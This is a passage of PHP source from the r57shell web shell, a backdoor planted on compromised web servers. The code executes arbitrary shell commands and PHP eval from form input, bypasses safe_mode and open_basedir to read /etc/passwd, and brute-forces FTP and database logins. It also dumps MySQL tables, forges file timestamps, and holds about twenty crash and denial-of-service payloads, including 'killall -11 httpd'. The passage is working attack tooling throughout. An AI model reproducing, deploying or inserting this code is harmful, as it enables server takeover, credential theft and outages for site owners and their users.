                                    echo $lang[$language . '_text61'];
                                    break;
                                case 'test15':
                                    @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../" . $_POST['test15_file2']);
                                    echo $lang[$language . '_text61'];
                                    break;
                                case 'test16':
                                    if (fopen('srpath://../../../../../../../../../../../' . $_POST['test16_file'], "a")) echo $lang[$language . '_text61'];
                                    break;
                                case 'test17_1':
                                    @unlink('symlinkread');
                                    @symlink('a/a/a/a/a/a/', 'dummy');
                                    @symlink('dummy/../../../../../../../../../../../' . $_POST['test17_file'], 'symlinkread');
                                    @unlink('dummy');
                                    while (1) {
                                        @symlink('.', 'dummy');
                                        @unlink('dummy');
                                    }
                                    break;
                                case 'test17_2':
                                    $str = '';
                                    while (strlen($str) < 3) {
                                        $temp = 'symlinkread';
                                        $str = moreread($temp);
                                        if ($str) {
                                            @ob_clean();
                                            echo htmlspecialchars($str);
                                        }
                                    }
                                    break;
                                case 'test17_3':
                                    $dir = $files = array();
                                    if (@version_compare(@phpversion(), "5.0.0") >= 0) {
                                        while (@count($dir) < 3) {
                                            $dir = @scandir('symlinkread');
                                            if (@count($dir) > 2) {
                                                @ob_clean();
                                                @print_r($dir);
                                            }
                                        }
                                    } else {
                                        while (@count($files) < 3) {
                                            $dh = @opendir('symlinkread');
                                            while (false !== ($filename = @readdir($dh))) {
                                                $files[] = $filename;
                                            }
                                            if (@count($files) > 2) {
                                                @ob_clean();
                                                @print_r($files);
                                            }
                                        }
                                    }
                                    break;
                                }
                            }
                            if ((!$safe_mode) && ($_POST['cmd'] != "php_eval") && ($_POST['cmd'] != "mysql_dump") && ($_POST['cmd'] != "db_query") && ($_POST['cmd'] != "ftp_brute") && ($_POST['cmd'] != "db_brute")) {
                                $cmd_rep = ex($_POST['cmd']);
                                if (!$unix) {
                                    echo @htmlspecialchars(@convert_cyr_string($cmd_rep, 'd', 'w')) . "\n";
                                } else {
                                    echo @htmlspecialchars($cmd_rep) . "\n";
                                }
                            }
                            switch ($_POST['cmd']) {
                                case 'dos1':
                                    function a() {
                                        a();
                                    }
                                    a();
                                break;
                                case 'dos2':
                                    @pack("d4294967297", 2);
                                break;
                                case 'dos3':
                                    $a = "a";
                                    @unserialize(@str_replace('1', 2147483647, @serialize($a)));
                                break;
                                case 'dos4':
                                    $t = array(1);
                                    while (1) {
                                        $a[] = & $t;
                                    };
                                break;
                                case 'dos5':
                                    @dl("sqlite.so");
                                    $db = new SqliteDatabase("foo");
                                break;
                                case 'dos6':
                                    preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
                                break;
                                case 'dos7':
                                    @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
                                break;
                                case 'dos8':
                                    @shell_exec("killall -11 httpd");
                                break;
                                case 'dos9':
                                    function cx() {
                                        @tempnam("/www/", "../../../../../../var/tmp/cx");
                                        cx();
                                    }
                                    cx();
                                break;
                                case 'dos10':
                                    $a = @str_repeat("A", 438013);
                                    $b = @str_repeat("B", 951140);
                                    @wordwrap($a, 0, $b, 0);
                                break;
                                case 'dos11':
                                    @array_fill(1, 123456789, "Infigo-IS");
                                break;
                                case 'dos12':
                                    @substr_compare("A", "A", 12345678);
                                break;
                                case 'dos13':
                                    @unserialize("a:2147483649:{");
                                break;
                                case 'dos14':
                                    $Data = @str_ireplace("\n", "<br>", $Data);
                                break;
                                case 'dos15':
                                    function toUTF($x) {
                                        return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
                                    }
                                    $str1 = "";
                                    for ($i = 0;$i < 64;$i++) {
                                        $str1.= toUTF(977);
                                    }
                                    @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
                                break;
                                case 'dos16':
                                    $r = @zip_open("x.zip");
                                    $e = @zip_read($r);
                                    $x = @zip_entry_open($r, $e);
                                    for ($i = 0;$i < 1000;$i++) $arr[$i] = array(array(""));
                                    unset($arr[600]);
                                    @zip_entry_read($e, -1);
                                    unset($arr[601]);
                                    break;
                                case 'dos17':
                                    $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
                                    $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
                                    $x = "AQ                                                                        ";
                                    unset($z);
                                    unset($y);
                                    $x = base64_decode($x);
                                    $y = @sqlite_udf_decode_binary($x);
                                    unset($x);
                                    break;
                                case 'dos18':
                                    $MSGKEY = 519052;
                                    $msg_id = @msg_get_queue($MSGKEY, 0600);
                                    if (!@msg_send($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) echo "Msg not sent because $msg_err\n";
                                    if (@msg_receive($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
                                        echo "$msg\n";
                                    } else {
                                        echo "Received $msg_error fetching message\n";
                                        break;
                                    }
                                    @msg_remove_queue($msg_id);
                                    break;
                                case 'dos19':
                                    $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";
                                    @fopen($url, "r");
                                    break;
                                case 'dos20':
                                    $hashtable = str_repeat("A", 39);
                                    $hashtable[5 * 4 + 0] = chr(0x58);
                                    $hashtable[5 * 4 + 1] = chr(0x40);
                                    $hashtable[5 * 4 + 2] = chr(0x06);
                                    $hashtable[5 * 4 + 3] = chr(0x08);
                                    $hashtable[8 * 4 + 0] = chr(0x66);
                                    $hashtable[8 * 4 + 1] = chr(0x77);
                                    $hashtable[8 * 4 + 2] = chr(0x88);
                                    $hashtable[8 * 4 + 3] = chr(0x99);
                                    $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
                                    for ($i = 0;$i < 65535;$i++) {
                                        $str.= 'i:0;R:2;';
                                    }
                                    $str.= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"' . $hashtable . '";i:0;R:3;';
                                    @unserialize($str);
                                    break;
                                }
                                if ($_POST['cmd'] == "php_eval") {
                                    $eval = @str_replace("<?", "", $_POST['php_eval']);
                                    $eval = @str_replace("?>", "", $eval);
                                    eval($eval);
                                }
                                if ($_POST['cmd'] == "ftp_brute") {
                                    $suc = 0;
                                    if ($_POST['brute_method'] == 'passwd') {
                                        foreach ($users as $user) {
                                            $connection = @ftp_connect($ftp_server, $ftp_port, 10);
                                            if (@ftp_login($connection, $user, $user)) {
                                                echo "[+] $user:$user - success\r\n";
                                                $suc++;
                                            } else if (isset($_POST['reverse'])) {
                                                if (@ftp_login($connection, $user, strrev($user))) {
                                                    echo "[+] $user:" . strrev($user) . " - success\r\n";
                                                    $suc++;
                                                }
                                            }
                                            @ftp_close($connection);
                                        }
                                    } else if (($_POST['brute_method'] == 'dic') && isset($_POST['ftp_login'])) {
                                        foreach ($users as $user) {
                                            $connection = @ftp_connect($ftp_server, $ftp_port, 10);
                                            if (@ftp_login($connection, $_POST['ftp_login'], $user)) {
                                                echo "[+] " . $_POST['ftp_login'] . ":$user - success\r\n";
                                                $suc++;
                                            }
                                            @ftp_close($connection);
                                        }
                                    }
                                    echo "\r\n-------------------------------------\r\n";
                                    $count = count($users);
                                    if (isset($_POST['reverse']) && ($_POST['brute_method'] == 'passwd')) {
                                        $count*= 2;
                                    }
                                    echo $lang[$language . '_text97'] . $count . "\r\n";
                                    echo $lang[$language . '_text98'] . $suc . "\r\n";
                                }
                                if ($_POST['cmd'] == "db_brute") {
                                    $suc = 0;
                                    if ($_POST['brute_method'] == 'passwd') {
                                        foreach ($users as $user) {
                                            $sql = new my_sql();
                                            $sql->db = $_POST['db'];
                                            $sql->host = $_POST['db_server'];
                                            $sql->port = $_POST['db_port'];
                                            $sql->user = $user;
                                            $sql->pass = $user;
                                            if ($sql->connect()) {
                                                echo "[+] $user:$user - success\r\n";
                                                $suc++;
                                            }
                                        }
                                        if (isset($_POST['reverse'])) {
                                            foreach ($users as $user) {
                                                $sql = new my_sql();
                                                $sql->db = $_POST['db'];
                                                $sql->host = $_POST['db_server'];
                                                $sql->port = $_POST['db_port'];
                                                $sql->user = $user;
                                                $sql->pass = strrev($user);
                                                if ($sql->connect()) {
                                                    echo "[+] $user:" . strrev($user) . " - success\r\n";
                                                    $suc++;
                                                }
                                            }
                                        }
                                    } else if (($_POST['brute_method'] == 'dic') && isset($_POST['mysql_l'])) {
                                        foreach ($users as $user) {
                                            $sql = new my_sql();
                                            $sql->db = $_POST['db'];
                                            $sql->host = $_POST['db_server'];
                                            $sql->port = $_POST['db_port'];
                                            $sql->user = $_POST['mysql_l'];
                                            $sql->pass = $user;
                                            if ($sql->connect()) {
                                                echo "[+] " . $_POST['mysql_l'] . ":$user - success\r\n";
                                                $suc++;
                                            }
                                        }
                                    }
                                    echo "\r\n-------------------------------------\r\n";
                                    $count = count($users);
                                    if (isset($_POST['reverse']) && ($_POST['brute_method'] == 'passwd')) {
                                        $count*= 2;
                                    }
                                    echo $lang[$language . '_text97'] . $count . "\r\n";
                                    echo $lang[$language . '_text98'] . $suc . "\r\n";
                                }
                                if ($_POST['cmd'] == "mysql_dump") {
                                    if (isset($_POST['dif'])) {
                                        $fp = @fopen($_POST['dif_name'], "w");
                                    }
                                    $sql = new my_sql();
                                    $sql->db = $_POST['db'];
                                    $sql->host = $_POST['db_server'];
                                    $sql->port = $_POST['db_port'];
                                    $sql->user = $_POST['mysql_l'];
                                    $sql->pass = $_POST['mysql_p'];
                                    $sql->base = $_POST['mysql_db'];
                                    if (!$sql->connect()) {
                                        echo "[-] ERROR! Can't connect to SQL server";
                                    } else if (!$sql->select_db()) {
                                        echo "[-] ERROR! Can't select database";
                                    } else if (!$sql->dump($_POST['mysql_tbl'])) {
                                        echo "[-] ERROR! Can't create dump";
                                    } else {
                                        if (empty($_POST['dif'])) {
                                            foreach ($sql->dump as $v) echo $v . "\r\n";
                                        } else if ($fp || @function_exists('file_put_contents')) {
                                            foreach ($sql->dump as $v) {
                                                @fwrite($fp, $v . "\r\n") or @fputs($fp, $v . "\r\n") or @file_put_contents($_POST['dif_name'], $v . "\r\n");
                                            }
                                        } else {
                                            echo "[-] ERROR! Can't write in dump file";
                                        }
                                    }
                                }
                                echo "</textarea></div>";
                                echo "</b>";
                                echo "</td></tr></table>";
                                echo "<table width=100% cellpadding=0 cellspacing=0>";
                                function div_title($title, $id) {
                                    return '<a style="cursor: pointer;" onClick="change_divst(\'' . $id . '\');">' . $title . '</a>';
                                }
                                function div($id) {
                                    if (isset($_COOKIE[$id]) && ($_COOKIE[$id] == 0)) return '<div id="' . $id . '" style="display: none;">';
                                    $divid = array('id5', 'id6', 'id8', 'id9', 'id10', 'id11', 'id16', 'id24', 'id25', 'id26', 'id27', 'id28', 'id29', 'id33', 'id34', 'id35', 'id37', 'id38');
                                    if (empty($_COOKIE[$id]) && @in_array($id, $divid)) return '<div id="' . $id . '" style="display: none;">';
                                    return '<div id="' . $id . '">';
                                }
                                if (!$safe_mode) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text2'], 'id1') . $table_up2 . div('id1') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text3'] . $arrow . "</b>", in('text', 'cmd', 85, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'dir', 85, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                } else {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text28'], 'id2') . $table_up2 . div('id2') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'dir', 85, $dir) . in('hidden', 'cmd', 0, 'safe_dir') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt6']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                echo $fs . $table_up1 . div_title($lang[$language . '_text42'], 'id3') . $table_up2 . div('id3') . $ts;
                                echo sr(15, "<b>" . $lang[$language . '_text43'] . $arrow . "</b>", in('text', 'e_name', 85, $dir) . in('hidden', 'cmd', 0, 'edit_file') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt11']));
                                echo $te . '</div>' . $table_end1 . $fe;
                                if ($safe_mode || $open_basedir) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text57'], 'id4') . $table_up2 . div('id4') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text58'] . $arrow . "</b>", in('text', 'mk_name', 54, (!empty($_POST['mk_name']) ? ($_POST['mk_name']) : ("new_name"))) . ws(4) . "<select name=action><option value=create>" . $lang[$language . '_text65'] . "</option><option value=delete>" . $lang[$language . '_text66'] . "</option></select>" . ws(3) . "<select name=what><option value=file>" . $lang[$language . '_text59'] . "</option><option value=dir>" . $lang[$language . '_text60'] . "</option></select>" . in('hidden', 'cmd', 0, 'mk') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt13']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if ($unix && @function_exists('touch')) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text128'], 'id5') . $table_up2 . div('id5') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text43'] . $arrow . "</b>", in('text', 'file_name', 40, (!empty($_POST['file_name']) ? ($_POST['file_name']) : ($dir . "/r57shell.php"))) . ws(4) . "<b>" . $lang[$language . '_text26'] . ws(2) . $lang[$language . '_text59'] . $arrow . "</b>" . ws(2) . in('text', 'file_name_r', 40, (!empty($_POST['file_name_r']) ? ($_POST['file_name_r']) : (""))));
                                    echo sr(15, "<b> or set  Day" . $arrow . "</b>", '
<select name="day" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>' . ws(4) . "<b>Month" . $arrow . "</b>" . '
<select name="month" size="1">
<option value="January">January</option>
<option value="February">February</option>
<option value="March">March</option>
<option value="April">April</option>
<option value="May">May</option>
<option value="June">June</option>
<option value="July">July</option>
<option value="August">August</option>
<option value="September">September</option>
<option value="October">October</option>
<option value="November">November</option>
<option value="December">December</option>
</select>' . ws(4) . "<b>Year" . $arrow . "</b>" . '
<select name="year" size="1">
<option value="1998">1998</option>
<option value="1999">1999</option>
<option value="2000">2000</option>
<option value="2001">2001</option>
<option value="2002">2002</option>
<option value="2003">2003</option>
<option value="2004">2004</option>
<option value="2005">2005</option>
<option value="2006">2006</option>
<option value="2006">2007</option>
<option value="2006">2008</option>
<option value="2006">2009</option>
<option value="2006">2010</option>
</select>' . ws(4) . "<b>Hour" . $arrow . "</b>" . '
<select name="chasi" size="1">
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
</select>' . ws(4) . "<b>Minute" . $arrow . "</b>" . '
<select name="minutes" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="38">38</option>
<option value="39">39</option>
<option value="40">40</option>
<option value="41">41</option>
<option value="42">42</option>
<option value="43">43</option>
<option value="44">44</option>
<option value="45">45</option>
<option value="46">46</option>
<option value="47">47</option>
<option value="48">48</option>
<option value="49">49</option>
<option value="50">50</option>
<option value="51">51</option>
<option value="52">52</option>
<option value="53">53</option>
<option value="54">54</option>
<option value="55">55</option>
<option value="56">56</option>
<option value="57">57</option>
<option value="58">58</option>
<option value="59">59</option>
</select>' . ws(4) . "<b>Second" . $arrow . "</b>" . '
<select name="second" size="1">
<option value="01">1</option>
<option value="02">2</option>
<option value="03">3</option>
<option value="04">4</option>
<option value="05">5</option>
<option value="06">6</option>
<option value="07">7</option>
<option value="08">8</option>
<option value="09">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
<option value="32">32</option>
<option value="33">33</option>
<option value="34">34</option>
<option value="35">35</option>
<option value="36">36</option>
<option value="37">37</option>
<option value="38">38</option>
<option value="39">39</option>
<option value="40">40</option>
<option value="41">41</option>
<option value="42">42</option>
<option value="43">43</option>
<option value="44">44</option>
<option value="45">45</option>
<option value="46">46</option>
<option value="47">47</option>
<option value="48">48</option>
<option value="49">49</option>
<option value="50">50</option>
<option value="51">51</option>
<option value="52">52</option>
<option value="53">53</option>
<option value="54">54</option>
<option value="55">55</option>
<option value="56">56</option>
<option value="57">57</option>
<option value="58">58</option>
<option value="59">59</option>
</select>' . in('hidden', 'cmd', 0, 'touch') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                $select = '';
                                if (@function_exists('chmod')) {
                                    $select.= "<option value=mod>CHMOD</option>";
                                }
                                if (@function_exists('chown')) {
                                    $select.= "<option value=own>CHOWN</option>";
                                }
                                if (@function_exists('chgrp')) {
                                    $select.= "<option value=grp>CHGRP</option>";
                                }
                                if ($unix && $select) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text67'], 'id6') . $table_up2 . div('id6') . $ts;
                                    echo @sr(15, "<b>" . $lang[$language . '_text43'] . $arrow . "</b>", in('text', 'param1', 55, (($_POST['param1']) ? ($_POST['param1']) : ($dir . "/r57shell.php"))) . ws(2) . "<b>" . $lang[$language . '_text68'] . $arrow . "</b>" . "<select name=what>" . $select . "</select>" . ws(4) . in('text', 'param2 title="' . $lang[$language . '_text71'] . '"', 10, (($_POST['param2']) ? ($_POST['param2']) : ("0777"))) . in('hidden', 'cmd', 0, 'ch_') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (!$safe_mode) {
                                    $aliases2 = '';
                                    foreach ($aliases as $alias_name => $alias_cmd) {
                                        $aliases2.= "<option>$alias_name</option>";
                                    }
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text7'], 'id7') . $table_up2 . div('id7') . $ts;
                                    echo sr(15, "<b>" . ws(9) . $lang[$language . '_text8'] . $arrow . ws(4) . "</b>", "<select name=alias>" . $aliases2 . "</select>" . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                echo $fs . $table_up1 . div_title($lang[$language . '_text54'], 'id8') . $table_up2 . div('id8') . $ts;
                                echo sr(15, "<b>" . $lang[$language . '_text52'] . $arrow . "</b>", in('text', 's_text', 85, 'text') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt12']));
                                echo sr(15, "<b>" . $lang[$language . '_text53'] . $arrow . "</b>", in('text', 's_dir', 85, $dir) . " * ( /root;/home;/tmp )");
                                echo sr(15, "<b>" . $lang[$language . '_text55'] . $arrow . "</b>", in('checkbox', 'm id=m', 0, '1') . in('text', 's_mask', 82, '.txt;.php') . "* ( .txt;.php;.htm )" . in('hidden', 'cmd', 0, 'search_text') . in('hidden', 'dir', 0, $dir));
                                echo $te . '</div>' . $table_end1 . $fe;
                                if (!$safe_mode && $unix) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text76'], 'id9') . $table_up2 . div('id9') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text72'] . $arrow . "</b>", in('text', 's_text', 85, 'text') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt12']));
                                    echo sr(15, "<b>" . $lang[$language . '_text73'] . $arrow . "</b>", in('text', 's_dir', 85, $dir) . " * ( /root;/home;/tmp )");
                                    echo sr(15, "<b>" . $lang[$language . '_text74'] . $arrow . "</b>", in('text', 's_mask', 85, '*.[hc]') . ws(1) . $lang[$language . '_text75'] . in('hidden', 'cmd', 0, 'find_text') . in('hidden', 'dir', 0, $dir));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                echo $fs . $table_up1 . div_title($lang[$language . '_text32'], 'id10') . $table_up2 . $font;
                                echo "<div align=center>" . div('id10') . "<textarea name=php_eval cols=100 rows=10>";
                                echo (!empty($_POST['php_eval']) ? ($_POST['php_eval']) : ("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
                                echo "</textarea>";
                                echo in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'php_eval');
                                echo "<br>" . ws(1) . in('submit', 'submit', 0, $lang[$language . '_butt1']);
                                echo "</div></div></font>";
                                echo $table_end1 . $fe;
                                if ($safe_mode || $open_basedir) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text34'], 'id11') . $table_up2 . div('id11') . $ts;
                                    echo "<table class=table1 width=100% align=center>";
                                    echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test2_file', 85, (!empty($_POST['test2_file']) ? ($_POST['test2_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test2') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(), "5.2.0") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text33'], 'id12') . $table_up2 . div('id12') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test1_file', 85, (!empty($_POST['test1_file']) ? ($_POST['test1_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test1') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && $mysql_on) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text35'], 'id13') . $table_up2 . div('id13') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'test3_md', 15, (!empty($_POST['test3_md']) ? ($_POST['test3_md']) : ("mysql"))) . ws(4) . "<b>" . $lang[$language . '_text37'] . $arrow . "</b>" . in('text', 'test3_ml', 15, (!empty($_POST['test3_ml']) ? ($_POST['test3_ml']) : ("root"))) . ws(4) . "<b>" . $lang[$language . '_text38'] . $arrow . "</b>" . in('text', 'test3_mp', 15, (!empty($_POST['test3_mp']) ? ($_POST['test3_mp']) : ("password"))) . ws(4) . "<b>" . $lang[$language . '_text14'] . $arrow . "</b>" . in('text', 'test3_port', 15, (!empty($_POST['test3_port']) ? ($_POST['test3_port']) : ("3306"))));
                                    echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test3_file', 96, (!empty($_POST['test3_file']) ? ($_POST['test3_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test3') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && $mssql_on) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text85'], 'id14') . $table_up2 . div('id14') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'test4_md', 15, (!empty($_POST['test4_md']) ? ($_POST['test4_md']) : ("master"))) . ws(4) . "<b>" . $lang[$language . '_text37'] . $arrow . "</b>" . in('text', 'test4_ml', 15, (!empty($_POST['test4_ml']) ? ($_POST['test4_ml']) : ("sa"))) . ws(4) . "<b>" . $lang[$language . '_text38'] . $arrow . "</b>" . in('text', 'test4_mp', 15, (!empty($_POST['test4_mp']) ? ($_POST['test4_mp']) : ("password"))) . ws(4) . "<b>" . $lang[$language . '_text14'] . $arrow . "</b>" . in('text', 'test4_port', 15, (!empty($_POST['test4_port']) ? ($_POST['test4_port']) : ("1433"))));
                                    echo sr(15, "<b>" . $lang[$language . '_text3'] . $arrow . "</b>", in('text', 'test4_file', 96, (!empty($_POST['test4_file']) ? ($_POST['test4_file']) : ("dir"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test4') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(), "5.2.0") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text112'], 'id15') . $table_up2 . div('id15') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test5_file', 96, (!empty($_POST['test5_file']) ? ($_POST['test5_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test5') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(), "5.2.0") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text113'], 'id20') . $table_up2 . div('id20') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'test6_file', 96, (!empty($_POST['test6_file']) ? ($_POST['test6_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test6') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(), "5.2.0") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text114'], 'id21') . $table_up2 . div('id21') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test7_file', 96, (!empty($_POST['test7_file']) ? ($_POST['test7_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test7') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(), "5.2.0") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text115'], 'id22') . $table_up2 . div('id22') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text116'] . $arrow . "</b>", in('text', 'test8_file1', 96, (!empty($_POST['test8_file1']) ? ($_POST['test8_file1']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test8'));
                                    echo sr(15, "<b>" . $lang[$language . '_text117'] . $arrow . "</b>", in('text', 'test8_file2', 96, (!empty($_POST['test8_file2']) ? ($_POST['test8_file2']) : ($dir))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(), "5.2.0") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text120'], 'id23') . $table_up2 . div('id23') . $ts;
